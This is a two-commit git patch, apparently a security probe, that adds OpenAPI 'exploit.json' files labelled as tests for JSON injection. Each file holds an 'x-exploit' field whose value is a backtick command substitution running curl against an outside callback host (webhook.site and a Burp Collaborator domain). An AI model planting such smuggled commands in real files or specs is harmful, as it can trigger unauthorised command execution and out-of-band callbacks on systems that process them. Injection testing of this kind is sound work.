From 91d6fc5a06cbdba95d3e97c8f8cf537bcf9b61a3 Mon Sep 17 00:00:00 2001 From: root Date: Thu, 19 Jun 2025 21:17:45 +0530 Subject: [PATCH 1/2] Add test for JSON injection --- openapi/openapi/exploit.json | 1 + 1 file changed, 1 insertion(+) create mode 100644 openapi/openapi/exploit.json diff --git a/openapi/openapi/exploit.json b/openapi/openapi/exploit.json new file mode 100644 index 0000000..d7b59e8 --- /dev/null +++ b/openapi/openapi/exploit.json @@ -0,0 +1 @@ +{ "x-exploit": "`curl https://webhook.site/yourid`" } From fd7bd0440098b416c44d792e794f58459b6a3958 Mon Sep 17 00:00:00 2001 From: root Date: Thu, 19 Jun 2025 22:43:42 +0530 Subject: [PATCH 2/2] Add test for JSON injection --- openapi/exploit.json | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 openapi/exploit.json diff --git a/openapi/exploit.json b/openapi/exploit.json new file mode 100644 index 0000000..a82b96c --- /dev/null +++ b/openapi/exploit.json @@ -0,0 +1,3 @@ +{ + "x-exploit": "`curl https://0stdfzhh9jlui6dt9qxwqin7cyio6d.burpcollaborator.net`" +}